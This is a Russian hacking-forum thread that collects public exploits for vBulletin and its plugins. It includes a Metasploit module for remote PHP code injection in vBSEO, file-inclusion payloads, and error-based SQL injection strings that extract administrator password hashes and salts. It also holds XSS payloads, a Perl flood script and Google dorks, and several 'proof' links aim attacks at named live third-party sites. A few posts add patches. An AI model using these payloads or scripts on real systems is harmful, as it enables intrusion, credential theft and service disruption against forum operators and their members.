1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Уязвимости vbulletin

Тема в разделе "Уязвимости популярных CMS", создана пользователем rijy, 29 авг 2006.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin 4.1.7 Beta 1 Remote File Inclusion

    Код:
    ====================================================
    vBulletin® Version 4.1.7 Beta 1 Mullti Vulnerability 
    ====================================================
    
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
    0    .    .--.   .--.   .---.      .                  1
    1  .'|        )      )      /      |                  0
    0    |     --:    --:      /    .-.| .-.  .  .        1
    1    |        )      )    /    (   |(   ) |  |        0
    0  '---'  `--'   `--'    '      `-'`-`-'`-`--|        1
    1                                            ;        0
    0     Site            : 1337day.com        `-'        1
    1     Support e-mail  : submit[at]inj3ct0r.com        0
    0     >> Exploit database separated by exploit        1 
    1           type (local, remote, DoS, etc.)           0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1
    
    #######################################################
    
               # Vendor: noLogging by SCRiPTZSECTOR.ORG 
    
                     # Date: 2011-07-27 
    
                    # Author : indoushka 
    
                +++=[ Dz Offenders Cr3w ]=+++
    
             # KedAns-Dz * Caddy-Dz * Kalashinkov3
     
          # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 
    
               # Contact : ind0ushka@hotmail.com
    
         # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr
    
    ########################################################################  
    # Exploit By indoushka

    Powered by vBulletin® Version 4.1.7 Beta 1

    [+] RFI:
    Код:
    Function: include		File: api.php          	Line: 139
    Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

    Код:
    Function: include		File: api.php          	Line: 139
    Exploit: http://localhost/vB1/api.php?api_script=[EV!L]

    Код:
    Function: require_once		File: payment_gateway.php          	Line: 3
    Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

    Код:
    Function: require_once		File: payment_gateway.php          	Line: 3
    Exploit: http://localhost/vB1/payment_gateway.php?api[classname]=[EV!L]

    Код:
    Function: include_once		File: cronadmin.php          	Line: 4
    Exploit: http://localhost/vB1/admincp/cronadmin.php?nextitem[filename]=[EV!L]

    Код:
    Function: include		File: diagnostic.php          	Line: 12
    Exploit: http://localhost/vB1/admincp/diagnostic.php?match[0]=[EV!L]

    Код:
    Function: require_once		File: diagnostic.php          	Line: 18
    Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

    Код:
    Function: require_once		File: diagnostic.php          	Line: 18
    Exploit: http://localhost/vB1/admincp/diagnostic.php?api[classname]=[EV!L]

    Код:
    Function: include_once		File: plugin.php          	Line: 22
    Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

    Код:
    Function: include_once		File: plugin.php          	Line: 22
    Exploit: http://localhost/vB1/admincp/plugin.php?safeid=[EV!L]

    Код:
    Function: include_once		File: class_block.php          	Line: 14
    Exploit: http://localhost/vB1/includes/class_block.php?file=[EV!L]

    Код:
    Function: require_once		File: class_humanverify.php          	Line: 2
    Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]

    Код:
    Function: require_once		File: class_humanverify.php          	Line: 2
    Exploit: http://localhost/vB1/includes/class_humanverify.php?chosenlib=[EV!L]

    Код:
    Function: require_once		File: class_paid_subscription.php          	Line: 24
    Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]

    Код:
    Function: require_once		File: class_paid_subscription.php          	Line: 24
    Exploit: http://localhost/vB1/includes/class_paid_subscription.php?methodinfo[classname]=[EV!L]

    Код:
    Function: require_once		File: functions.php          	Line: 6
    Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

    Код:
    Function: require_once		File: functions.php          	Line: 6
    Exploit: http://localhost/vB1/includes/functions.php?classfile=[EV!L]

    Код:
    Function: include_once		File: functions_cron.php          	Line: 8
    Exploit: http://localhost/vB1/includes/functions_cron.php?nextitem[filename]=[EV!L]

    Код:
    Function: require		File: vb.php          	Line: 7
    Exploit: http://localhost/vB1/vb/vb.php?filename=[EV!L]

    Код:
    Function: require_once		File: class_upgrade.php          	Line: 48
    Exploit: http://localhost/vB1/install/includes/class_upgrade.php?chosenlib=[EV!L]


    Код:
    Function: include_once		File: attach.php          	Line: 80
    Exploit: http://localhost/vB1/packages/vbattach/attach.php?package=[EV!L]

    Код:
    Function: include_once		File: attach.php          	Line: 604
    Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

    Код:
    Function: include_once		File: attach.php          	Line: 1222
    Exploit: http://localhost/vB1/packages/vbattach/attach.php?path=[EV!L]

    [свернуть]


    Directory Listing ckeditor :

    http://localhost/vB1/clientscript/ckeditor/
     
    Последнее редактирование: 30 ноя 2011
    30 ноя 2011
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin 4.1.10 Full Path Disclosure

    [Info]

    Код:
    # Author: linc0ln.dll
    # Exploit Title: vBulletin 4.1.10 Full Path Disclosure
    # Date: 16/01/2012
    # Vendor or Software Link: http://www.vbulletin.com/
    # Category: WebApp
    # Version: 4.1.10
    # Contact: linc@tormail.net
    # Website: linc6.wordpress.com
    # Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |
    VoltroN | amiugly | b00y4k4 |
    [Vulnerability]

    # Full Path Disclosure:

    Код:
    http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
    Код:
    http://localhost/path/calendar.php?do[]=linc0ln.dll
    Код:
    http://localhost/path/search.php?do[]=linc0ln.dll
    # Demo:

    Код:
    http://www.ezoforum.pl/search.php?do[]=linc0ln.dll
    Код:
    http://www.eprog.pl/search.php?do[]=linc0ln.dll
    Код:
    http://www.englishsabla.com/forum/search.php?do[]=linc0ln.dll
    (c) linc0ln.pl
     
    Последнее редактирование: 22 янв 2012
    22 янв 2012
  3. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit


    Код:
    require 'msf/core'
    class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::Remote::HttpClient
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
                'Description'    => %q{
                        This module exploits a vulnerability in the 'proc_deutf()' function
                    defined in /includes/functions_vbseocp_abstract.php. User input passed through
                    'char_repl' POST parameter isn't properly sanitized before being used in a call
                    to preg_replace() function which uses the 'e' modifier. This can be exploited to
                    inject and execute arbitrary code leveraging the PHP's complex curly syntax.
                },
                'Author'         => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
                'License'        => MSF_LICENSE,
                'Version'        => '$Revision$',
                'References'     =>
                    [
                        ['BID', '51647'],
                        ['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],
                    ],
                'Privileged'     => false,
                'Payload'        =>
                    {
                        'DisableNops' => true,
                        'Space'       => 8190,
                        'Keys'        => ['php'],
                    },
                'Platform'       => ['php'],
                'Arch'           => ARCH_PHP,
                'Targets'        => [[ 'Automatic', { }]],
                'DisclosureDate' => 'Jan 23 2012',
                'DefaultTarget'  => 0))
                register_options(
                    [
                        OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
                    ], self.class)
        end
        def check
            flag = rand_text_alpha(rand(10)+10)
            data = "char_repl='{${print(#{flag})}}'=>"
            uri = ''
            uri << datastore['URI']
            uri << '/' if uri[-1,1] != '/'
            uri << 'vbseocp.php'
            response = send_request_cgi({
                'method' => "POST",
                'uri' => uri,
                'data' => "#{data}"
            })
            if response.code == 200 and response.body =~ /#{flag}/
                return Exploit::CheckCode::Vulnerable
            end
            return Exploit::CheckCode::Safe
        end
        def exploit
            if datastore['CMD']
                p = "passthru(\"%s\");" % datastore['CMD']
                p = Rex::Text.encode_base64(p)
            else
                p = Rex::Text.encode_base64(payload.encoded)
            end
            data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
            uri = ''
            uri << datastore['URI']
            uri << '/' if uri[-1,1] != '/'
            uri << 'vbseocp.php'
            response = send_request_cgi({
                'method' => 'POST',
                'uri' => uri,
                'data' => data,
                'headers' => { 'Code' => p }
            })
            print_status("%s" % response.body) if datastore['CMD']
        end
    end
    
    (с) exploit-db


    vBadvanced CMPS 3.2.2 Local File Inclusion / Remote File Inclusion


    Код:
    # Exploit Title: vBadvanced CMPS <= v3.2.2 [RFI/LFI]
    # Date: 25.01.2012
    # Author: PacketiK email: packeto[dog]mail[dot]ru icq: 555555555 and Ulitochka =P
    # Software Link: http://www.vbadvanced.com/
    # Version: v3.2.2
    #Зависимость:
    register_globals = on

    file: vba_cmps_include_bottom.php vuln_code:
    // Process PHP file pages here to avoid having to globalize variables

    Код:
    if ($pages['type'] == 'php_file' AND $vba_cusmodid)
    {
    ob_start();
    require($pages['template']);
    $home[$vba_cusmodid]['content'] = ob_get_contents();
    ob_end_clean();
    }
    Mini_exploits:
    need: allow_url_include = On

    POST:
    Код:
    http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=php://input HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 38
    Код:
    <?php phpinfo();ob_end_flush();exit;?>
    Or:

    Код:
    http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
    Or:

    Код:
    http://localhost/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:pass@127.0.0.1/123.txt
     
    Последнее редактирование: 27 янв 2012
    27 янв 2012
  4. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBShout persistent XSS 0day


    Код:
    # Exploit Title: vBShout persistent XSS 0day
    # Google Dork: "DragonByte Technologies Ltd" vbshout
    # Date: 21/3/2012 9:00 PM #EST
    # Author: ToiL
    # Software Link: http://www.dragonbyte-tech.com/
    # Version: all
    # Tested on: all
    # CVE : XSS
    #Greeting from Team Odyessy.
    #Today we will release a 0day for the vBulletin mod, vBShout.
    #This 0day exploit is brought to you by www.Bugabuse.net/
    #Have fun, And happy exploiting.
    ######Guide########
    Enter
    <script>top.location='https://www.bugabuse.net/';</script>
    into the shoutbox
    go into the archive.
    Vioala. Persistent XSS exploit.
    Modify to your liking.
     
    Последнее редактирование: 31 мар 2012
    22 мар 2012
  5. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBshop persistent Persisstant XSS


    Код:
    # Exploit Title: vBshop persistent XSS 0day
    # Google Dork: "DragonByte Technologies Ltd" vbshout
    # Date: 25/3/2012 9:32 PM #EST
    # Author: ToiL
    # Software Link: http://www.dragonbyte-tech.com/
    # Version: all
    # Tested on: all
    # CVE : XSS
    
    #Greeting from Team Odyessy.
    #Today we will release a 0day for the vBulletin mod, vBShout.
    #This 0day exploit is brought to you by
    www.Bugabuse.net/<http://www.bugabuse.net/>
    #Have fun, And happy exploiting.
    
    ######Guide########
    
    
    Go to vBshop
    Gift an item to aother user.
    In the 'message to user' put:
    <script>top.location='https://www.bugabuse.net/';</script>
    Send the item off.
    Go to the users profile that you gifted
    Boom. Pers. XSS.
    Edit to your likeing.
    Источник: bugsearch.net​
     
    31 мар 2012
  6. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin 4.1.10 Sql Injection Vulnerabilitiy


    Код:
    #
    # Exploit Title : vBulletin 4.1.10 Sql Injection Vulnerabilitiy
    #
    # Author : IrIsT.Ir
    #
    # Discovered By : Am!r
    #
    # Home : http://IrIsT.Ir
    #
    # Software Link : http://vbulletin.com
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : "Powered By Vbulletin"
    #
    Expl0iTs :
    Код:
    http://vbulletin.com/announcement.php?a=&announcementid=[Sql]
    securityhome
     
    6 апр 2012
  7. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin 3.X/4.X CSRF IMG-Tag Exploit

    описание и фикс от P4INW4R

    Код:
    ===============================================================
    vBulletin 3.X/4.X CSRF IMG-Tag Exploit
    ===============================================================
     
    ___________      .__           .__  _______          
    \_   _____/ ____ |  |__   ____ |  | \   _  \   ____  
     |    __)__/ ___\|  |  \_/ __ \|  | /  /_\  \ /    \
     |        \  \___|   Y  \  ___/|  |_\  \_/   \   |  \
    /_______  /\___  >___|  /\___  >____/\_____  /___|  /
            \/     \/     \/     \/            \/     \/
     
    # Exploit Title: vBulletin 3.X/4.X CSRF IMG-Tag Exploit
    # Date: 28/04/2011                          
    # Author: Cyber Tjak                    
    # Software Link: http://www.vBulletin.org
    # Version: 3.X & 4.X
    # Google Dork 1: Powered by vBulletin 3.X
    # Google Dork 2: Powered by vBulletin 4.X
    # Platform / Tested on: Multiple
    # Category: Webapplications
    # Code : N/A
     
    #  BUG :  ######################################################################
     
    1 > Go to something were you want to include it e.g. /profile.php?do=editsignature
    The IMG-Tag must be allowed there.
     
    2 > Post a new post with these content ===> [​IMG]
     
    3 > You can use it with a plugin like iTrader http://[localhost]/board/itrader_fee...RID&parseurl=1
    Furthermore you can use it with external scripts like an ip-logging script.
    Just like a normal CSRF-Vuln. =)
     
    4 > Now you see that your script is working.
     
     
    #  FIX by P4INW4R :  ###########################################################
     
    You must create a whitelist for trustworthy imagehosters.
     
    1 > Open ./includes/class_bbcode.php
     
    2 > Search for:
     
            function handle_bbcode_img_match($link)
            {
                    $link = $this->strip_smilies(str_replace('\\"', '"', $link));
     
                    // remove double spaces -- fixes issues with wordwrap
                    $link = str_replace(array('  ', '"'), '', $link);
     
                    return '<img src="' .  $link . '" border="0" alt="" />';
            }
     
    3 > Replace with:
     
            function handle_bbcode_img_match($link)
            {
                    $link = $this->strip_smilies(str_replace('\\"', '"', $link));
                   
                    // remove double spaces -- fixes issues with wordwrap
                    $link = str_replace(array('  ', '"'), '', $link);
     
                    //CSRF FIX
                    $whitelist = array("HERE YOUR IMAGEHOSTER WITHOUT HTTP:// e.g. abload.de");
                   
                    $host = parse_url($link, PHP_URL_HOST);
                    if(substr($host, 0, 4) == "www.")
                    {
                    $host = str_replace("www.", "", $host);
                    }
           
                    if (in_array($host, $whitelist)) {
                    return '<img src="' .  $link . '" border="0" alt="" />';
                    }
                    else
                    {
                    return '<p style="color: red;">Please upload your picture at a trusted hoster. For example abload.de</p>';
                    }              
            }
     
    We know that this fix-method is suboptimal so we must wait for a better fix by vBulletin.
     
     
    ################################################################################
     
    Our Website: http://www.echel0n.net
     
    Special Thanks to: P4INW4R, Subnet, Skittles, 0x00, Santa & all other mates.
     
    ################################################################################
    и с "нашими" сервисами загрузки пикч)
    Код:
    /**
    	* Handles a match of the  tag that will be displayed as an actual image.
    	*
    	* @param	string	The URL to the image.
    	*
    	* @return	string	HTML representation of the tag.
    	*/
        function handle_bbcode_img_match($link)
    	{
    		$link = $this->strip_smilies(str_replace('\\"', '"', $link));
    
    		// remove double spaces -- fixes issues with wordwrap
    		$link = str_replace(array('  ', '"'), '', $link);
    
    		$whitelist = array(
    		"xaker.name",
    		"grabberz.com",
    		"google.com",
    		"google.ru",
    		"yandex.ru",
    		"savepic.net",
    		"savepic.ru",
    		"hostingkartinok.com",
    		"imglink.ru",
    		"imageshost.ru",
    		"pixshock.net",
    		"radikal.ru",
    		"saveimg.ru",
    		"ipicture.ru",
    		"jpg1.ru",
    		"imagepost.ru",
    		"jpeghost.ru",
    		"impic.ru",
    		"fastpic.ru",
    		"imgex.com",
    		"pictureshack.ru",
    		"keep4u.ru",
    		"myphotoalbum.ru",
    		"4put.ru",
    		"xmages.net",
    		"lostpic.net");
    
    		$host = parse_url($link, PHP_URL_HOST);
    		if(substr($host, 0, 4) == "www.")
    		{
    		$host = str_replace("www.", "", $host);
    		}
    
    		if (in_array($host, $whitelist)) {
    		return '<img src="' .  $link . '" border="0" alt="" />';
    		}
    		else
    		{
    		return '<p style="color: red;">Please upload your picture at a trusted hoster. For: savepic.net, radikal.ru, ipicture.ru, fastpic.ru, etc</p>';
    		}
    	}[/CODE]
    можно еще и свой домен добавить, если стоят хаки вроде "Img хостинга", иначе вставка в посты/подписи будет невозможна:)
     
    Последнее редактирование: 22 июн 2012
    20 май 2012
  8. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    vBulletin 4.2.0 XSS Vulnerability

    Код:
    $------------------------------------------------------------------------------------------------------------
    $ vBulletin 4.2.0 XSS Vulnerability 
    $ Author : sangteamtham 
    $ Home : Hcegroup.vn 
    $ Download: http://members.vbulletin.com/ 
    $ Date :06/13/2012 
    $ Google Dork: "Powered by vBulletin® Version 4.2.0"
    $ Twitter: http://twitter.com/Sangte_amtham
    $************************************************************************************************************* 
    1.vBulletin Description:
    
     Content publishing, search, security, and more— vBulletin has it all. 
     Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money. 
     Learn more about what makes vBulletin the choice for people who are serious about creating 
     thriving online communities.
    
    2. Vulnerability Description:
    
    To steal cookie from administrator or any member in a forum or drive them to malicious sites, attacker will firstly create an account, then come to 
    calendar section, and create an event for himself. 
    
    In title, he will inject XSS code there. For sample:
    
    "><img src=x onerror=alert(1)> 
    
    In content section, he will write everything he likes. Now, he will send his profile to Administrator or any member
    and wait for cookie or victims' infection.
    
    http://127.0.0.1/vbb/member.php?id-xyz
    
    3. Patch:
    
    June 13, 2012: Contacted the vendor. 
    June 14, 2012: Vendor replied me.
    June 18, 2012: the vendor released the patch for this vulnerabitily. Please download it from member Area right now.
    
    https://members.vbulletin.com/patches.php
    
    (c) Hcegroup.vn ​

    [FIX] XSS Exploit - vBulletin 4.2.0

    открыть
    Код:
    /vb/activitystream/view/perm/calendar/event.php
    Код:
        public function fetchTemplate($templatename, $activity)
        {
            $eventinfo =& $this->content['event'][$activity['contentid']];
            $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];
    
            $activity['postdate'] = vbdate(vB::$vbulletin->options['dateformat'], $activity['dateline'], true);
            $activity['posttime'] = vbdate(vB::$vbulletin->options['timeformat'], $activity['dateline']);
    
            $preview = strip_quotes($eventinfo['event']);
            $eventinfo['preview'] = htmlspecialchars_uni(fetch_censored_text(
                fetch_trimmed_title(strip_bbcode($preview, false, true, true, true),
                    vb::$vbulletin->options['as_snippet'])
            ));
    
            $templater = vB_Template::create($templatename);
                $templater->register('userinfo', $this->content['user'][$activity['userid']]);
                $templater->register('activity', $activity);
                $templater->register('eventinfo', $eventinfo);
                $templater->register('calendarinfo', $calendarinfo);
            return $templater->render();
        }
    после

    Код:
    $activity[posttime']
    добавить

    Код:
    $eventinfo['title'] = htmlspecialchars_uni($eventinfo['title']);
    Код:
        public function fetchTemplate($templatename, $activity)
        {
            $eventinfo =& $this->content['event'][$activity['contentid']];
            $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];
    
            $activity['postdate'] = vbdate(vB::$vbulletin->options['dateformat'], $activity['dateline'], true);
            $activity['posttime'] = vbdate(vB::$vbulletin->options['timeformat'], $activity['dateline']);
            $eventinfo['title'] = htmlspecialchars_uni($eventinfo['title']);
    
            $preview = strip_quotes($eventinfo['event']);
            $eventinfo['preview'] = htmlspecialchars_uni(fetch_censored_text(
                fetch_trimmed_title(strip_bbcode($preview, false, true, true, true),
                    vb::$vbulletin->options['as_snippet'])
            ));
    
            $templater = vB_Template::create($templatename);
                $templater->register('userinfo', $this->content['user'][$activity['userid']]);
                $templater->register('activity', $activity);
                $templater->register('eventinfo', $eventinfo);
                $templater->register('calendarinfo', $calendarinfo);
            return $templater->render();
        }
    _http://unstuck.fr/showthread.php/396-FIX-XSS-Exploit-vBulletin-4-2-0?p=413
     
    22 июн 2012
  9. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Бага в хаке Arcade

    [0-Day] ibPro Arcade vBulletin Exploit

    Код:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=[SQLi]
    Fetch the password & salt of user ID 1:

    Код:
    /arcade.php?act=Arcade&do=stats&comment=a&s_id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT CONCAT(password,0x3a,salt) FROM user WHERE id = 1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    proof:
    Код:
    [noparse]http://www.nohomers.net/arcade.php?act=Arcade&do=stats&comment=a&s_id=1%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(password,0x3a,salt)%20FROM%20user%20WHERE%20id%20=%201),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a[/noparse])
    Код:
    mySQL error: Duplicate entry '7a4d3244d834397e38b65ef817e62cb4:Q:v)r!oe@KuF:L5@aA91^qyiaTOsC%1' for key 'group_key'
    https://www.google.ru/search?sugexp...q=/arcade.php?act=Arcade+Powered+by+vBulletin
    Результатов: примерно 233 000

    (c) p0wersurge.com
     
    Последнее редактирование: 2 июл 2012
    2 июл 2012
  10. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Код:
    [+] vBulletin all 3 vBulletin full path disclosure Vulnerability
    [-] Found by Angel Injection
    [-] Version: all 3
    [-] Security -::RISK: Just For Information So "Low"
    [-] platforms: php
    [-] http://1337day.com http://r00tw0rm.com http://i313.cc
    
    [+] Thanx To "Mhd1"

    Exploit work on

    [noparse]http://localhost/search.php?do[]=1337[/noparse]

    [noparse]http://localhost/profile.php?do[]=1337[/noparse]

    [noparse]http://localhost/subscription.php?do[]=1337[/noparse]

    Online Test

    [noparse]http://www.vbhacker.net/vb/search.php?do[]=i313.cc/313 And 1337day.com[/noparse]

    [noparse]http://www.vbhacker.net/vb/profile.php?do[]=i313.cc/313 And 1337day.com[/noparse]

    [noparse]http://www.vbhacker.net/vb/subscription.php?do[]=i313.cc/313 And 1337day.com[/noparse]

    P.S. vBulletin all 3 - хз почему все версии, на хн точно не работает)
    избавится от "баги" если ее так можно назвать конечно, можно например так
    [noparse]http://0x0000ed.com/#!/post/4[/noparse]
     
    Последнее редактирование: 5 июл 2012
    4 июл 2012
  11. p0wER
    p0wER Новичок
    Симпатии:
    41
    Inferno vBShout SQLI 0day <= 2.5.2
    Код:
    ====================================================================
    #               Inferno vBShout SQLI 0day <= 2.5.2                 #
    ====================================================================
       ______     _ ______          
      / ____/____(_) __/ /____  _____
     / / __/ ___/ / /_/ __/ _ \/ ___/
    / /_/ / /  / / __/ /_/  __/ /   
    \____/_/  /_/_/  \__/\___/_/    
                                      
    ====================================================================
    #               Inferno vBShout SQLI 0day <= 2.5.2                 #
    ====================================================================
    # Found by: Luit
    # Site: http://grifter.org
    # E-Mail: luit@usa.com
    # Date: 14/08/2012
     
    ====================================================================
    #    Vulnerable Code - infernoshout.php & inferno_settings.php     #
    ====================================================================
    $commands = unserialize($this->settings['s_commands']);
     
    if ($this->vbulletin->db->affected_rows() < 1 && !$this->vbulletin->db->query_first("select * from " . TABLE_PREFIX . "infernoshoutusers where s_user='{$this->vbulletin->userinfo['userid']}'"))
            {
                $this->vbulletin->db->query("
                    insert into " . TABLE_PREFIX . "infernoshoutusers
                    (s_user, s_commands)
                    values
                    ({$this->vbulletin->userinfo['userid']}, '" . serialize($commands) . "')
                ");
            }
             
    ====================================================================
    #                           Exploit Location                       #
    ====================================================================
    # Location: http://site.com/infernoshout.php?do=options&area=commands
     
    ====================================================================
    #                           SQL Injection                          #
    ====================================================================
    ' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
     
    ====================================================================
    #                           How to use                             #
    ====================================================================
     
    Insert SQL injection into the first "Command Input" box and enter anything into the first "Command Output" box, hit save settings, you will be treated with a database error, view the page source and scroll to the bottom of the page, you will see some quoted text containing the data you want.
    ====================================================================
    #                           Video Tutorial                         #
    ====================================================================
    http://www.youtube.com/watch?v=g70_JaKnBbw
     
    ====================================================================
    #                          Peace out nigga                         #
    ====================================================================
    # Found by: Luit
    # Site: http://grifter.org
    # E-Mail: luit@usa.com
    ====================================================================
    #                          Peace out nigga                         #
    ====================================================================
    
    Прямо лето булко уязвимостей.
     
    18 авг 2012
    1 человеку нравится это.
  12. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    53
    vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day

    Information:

    Код:
    Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
    Google Dork: inurl:awards.php intext:"powered by vbulletin"
    Date: 29/08/12
    Exploit Author: Backsl@sh/Dan
    Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
    Version: 4.0.2+
    Vuln. code:

    PHP:
    $vbulletin->input->clean_array_gpc('p', array(
                
    'award_id' => TYPE_UINT,
                
    //'award_request_name' => TYPE_STR,
                //'award_request_recipient_name' => TYPE_STR,
                
    'award_request_reason' => TYPE_STR,
                
    'award_request_uid' => TYPE_UNIT,
        ));
     
    $award_request_uid $vbulletin->GPC['award_request_uid'];
    > > 
    $db->query_write("INSERT INTO " TABLE_PREFIX "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '"$db->escape_string($vbulletin->GPC['award_request_reason']) ."')");
     
    $award_request_uid is used within an insert into statementunsanitized.
    POC:

    Код:
    http://[site].com/request_award.php
    POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit
     
    31 авг 2012
  13. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Exploit Title : Vbulletin v4.1.12 Sql php command execute Vulnerability

    Код:
    Exploit Title : Vbulletin v4.1.12 Sql php command execute Vulnerability
    Author : IrIsT.Ir
    
    Discovered By : Am!r
    
    Home : http://IrIsT.Ir/forum
    
    Software Link : http://www.Vbulletin.com/
    
    Security Risk : High
    
    Version : All Version
    
    Tested on : GNU/Linux Ubuntu - Windows Server - win7
    Dork : intext:"Powered By Vbulletin 4.1.12"
    Exploit:
    Код:
    http://target.com/search.php?do=process&flood_result=[PCE]
    source bugsearch.net​
     
    1 сен 2012
  14. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Yet Another Usergroup Legend (AJAX)

    Код:
    Home: xaker.name & grabberz.com
    тема с хаком [noparse]http://www.vbulletin.org/forum/showthread.php?t=181956, http://vbsupport.org/forum/showthread.php?t=26774[/noparse]

    Код:
    ajax.php?do=getgroup&groupis=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(103),CHAR(102),CHAR(81),CHAR(73),CHAR(71),CHAR(85),CHAR(90),CHAR(112)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
    proof:
    Код:
    http://sea-wave.ru/forum/ajax.php?do=getgroup&groupis=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(103),CHAR(102),CHAR(81),CHAR(73),CHAR(71),CHAR(85),CHAR(90),CHAR(112)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
    за помощь и пинок в правильную сторону спасибо кативо;)
    пофиксеная версия в аттаче
    Посмотреть вложение product-yaugl_mdm_cp1251.zip
     
    Последнее редактирование: 4 окт 2012
    10 сен 2012
  15. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    246
    Vbulletin 4.1.* Remote Denial of Service


    Код:
    #!/usr/bin/perl
    # Vbulletin 4.1.* Remote Denial of Service
    # Version: 4.0.11
    # Home : http://Www.IrIsT.Ir/forum
    # Security : High
    
    
    use IO::Socket;
    print "###########################################################################\n";
    print "# #\n";
    print "# Islamic Republic Of Iran Security Team - Vbulletin DDOSer #\n";
    print "# Home : Www.IrIsT.Ir & Www.IrIsT.Ir/forum #\n";
    print "# #\n";
    print "###########################################################################\n";
    print "Vbulletin DDOSer\n";
    print "Site : ";
    $HOST = <STDIN>; 
    chop ($HOST); 
    
    $i=0;
    while($i<500000){
    $i++;
    
    $lower=1; 
    $upper=200000; 
    $random = int(rand( $upper-$lower+1 ) ) + $lower; 
    $FILE = "1111111111111111111111111111111111111111111111111111111111111111111111111111";
    $LENGTH = length $FILE;
    
    $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "*";
    print $get1 "POST /image.php?type= HTTP/1.1\n";
    print $get1 "Host: ".$HOST. "\n";
    print $get1 $FILE;
    syswrite STDOUT, "*";
    } 
    # Greetz : TBH - Security7.Ir - GreyH4t.Com - Datacoders.org - Shabgard.Org & All IrIsT.Ir & Iranian Security Team
    Vbulletin 4.1.10 (functions_cron.php) Local file Include Vulnerabilities


    Код:
    ########################################################
    #
    # Exploit Title : Vbulletin 4.1.10 (functions_cron.php) Local file Include Vulnerabilities
    #
    # Author : #BHG Security Center - IrIsT Security Team
    #
    # Discovered By : Am!r
    #
    # Home : http://Black-hg.Org - http://IrIsT.Ir
    #
    # Software Link : http://vbulletin.com
    #
    # Security Risk : High
    #
